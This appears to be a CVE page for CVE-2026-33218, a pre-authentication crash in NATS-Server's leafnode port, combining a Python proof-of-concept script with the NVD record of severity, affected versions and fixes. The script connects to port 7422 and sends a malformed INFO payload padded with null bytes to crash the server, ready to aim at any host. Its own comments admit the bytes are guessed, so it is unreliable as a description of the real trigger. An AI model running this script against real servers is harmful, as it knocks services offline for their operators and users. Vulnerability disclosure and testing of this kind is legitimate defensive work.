CVE-2026-33218

import socket # CVE-2026-33218 PoC Concept for NATS-Server # Target: NATS-Server < 2.11.15, < 2.12.6 # Description: Connect to leafnode port and send malformed message to trigger crash. def send_exploit(target_host, target_port): try: # Establish TCP connection to the leafnode port print(f"[*] Connecting to {target_host}:{target_port}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_host, target_port)) print("[+] Connection established.") # Construct a malformed message that violates the NATS protocol # This payload simulates an invalid INFO or CONNECT protocol handshake # which triggers the parsing vulnerability in the leafnode handler. # Note: The exact bytes may vary based on specific protocol parsing logic. malformed_payload = b"INFO \"malformed_json_structure\"\r\n" + b"\x00" * 1000 + b"\r\n" print("[*] Sending malformed payload...") s.send(malformed_payload) # Attempt to receive response (Server might crash before responding) response = s.recv(1024) print(f"[+] Received response: {response}") except ConnectionResetError: print("[!] Connection reset by peer - possible crash detected.") except socket.timeout: print("[!] Connection timed out - possible hang detected.") except Exception as e: print(f"[-] An error occurred: {e}") finally: s.close() if __name__ == "__main__": TARGET_IP = "127.0.0.1" # Replace with target IP LEAFNODE_PORT = 7422 # Default leafnode port send_exploit(TARGET_IP, LEAFNODE_PORT)

{"cve": {"id": "CVE-2026-33218", "sourceIdentifier": "[email protected]", "published": "2026-03-25T20:16:32.623", "lastModified": "2026-03-26T17:15:02.390", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NATS-Server is a High-Performance server for NATS.io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, a client which can connect to the leafnode port can crash the nats-server with a certain malformed message pre-authentication. Versions 2.11.15 and 2.12.6 contain a fix. As a workaround, disable leafnode support if not needed or restrict network connections to the leafnode port, if plausible without compromising the service offered."}, {"lang": "es", "value": "NATS-Server es un servidor de alto rendimiento para NATS.io, un sistema de mensajería nativo de la nube y del borde. Antes de las versiones 2.11.15 y 2.12.6, un cliente que puede conectarse al puerto leafnode puede bloquear el nats-server con un mensaje malformado específico pre-autenticación. Las versiones 2.11.15 y 2.12.6 contienen una corrección. Como solución alternativa, deshabilite el soporte de leafnode si no es necesario o restrinja las conexiones de red al puerto leafnode, si es factible sin comprometer el servicio ofrecido."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.11.15", "matchCriteriaId": "13EA156E-2759-4586-A22E-CDEAAD4D610C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:linuxfoundation:nats-server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.12.0", "versionEndExcluding": "2.12.6", "matchCriteriaId": "4E347CFB-C56D-4FD8-8DD8-3D34C08D7154"}]}]}], "references": [{"url": "https://advisories.nats.io/CVE/secnote-2026-10.txt", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/nats-io/nats-server/security/advisories/GHSA-vprv-35vv-q339", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}